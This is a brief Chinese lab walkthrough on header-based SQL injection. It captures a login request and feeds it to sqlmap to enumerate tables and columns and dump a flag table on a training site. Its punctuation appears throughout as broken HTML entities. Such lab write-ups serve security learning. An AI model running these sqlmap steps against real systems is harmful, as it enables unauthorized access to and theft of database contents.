head注入之sqlmap

head&＃xff08;一&＃xff09;
注入环境&＃xff1a;http://inject2.lab.aqlab.cn:81/Pass-07/index.php
前面我们都是用的手动注入&＃xff0c;为了是了解原理&＃xff0c;
既然原理清楚了后&＃xff0c;我们为了提高效率&＃xff0c;就可以使用工具来快速完成任务
攻击流程&＃xff1a;
　　　　1&＃xff1b;填写正确的账号密码&＃xff0c;然后抓包
　　　　2&＃xff1b;把抓到的数据保存为一个文件
　　　　3&＃xff1b;用sqlmap来自动破解&＃xff0c;
　　　　4&＃xff1b;获取信息。
　　测试开始&＃xff1a;
　　　　测试目标获取管理员账号密码

sqlmap不会的&＃xff0c;可以康康这篇博客sqlmap基础用法

获取表名
sqlmap.py -r 321.txt -D head_error --tables

获取字段
sqlmap.py -r 321.txt -D head_error -T flag_head --columns

获取字段值
sqlmap.py -r 321.txt -D head_error -T flag_head -C Id,flag_h1 --dump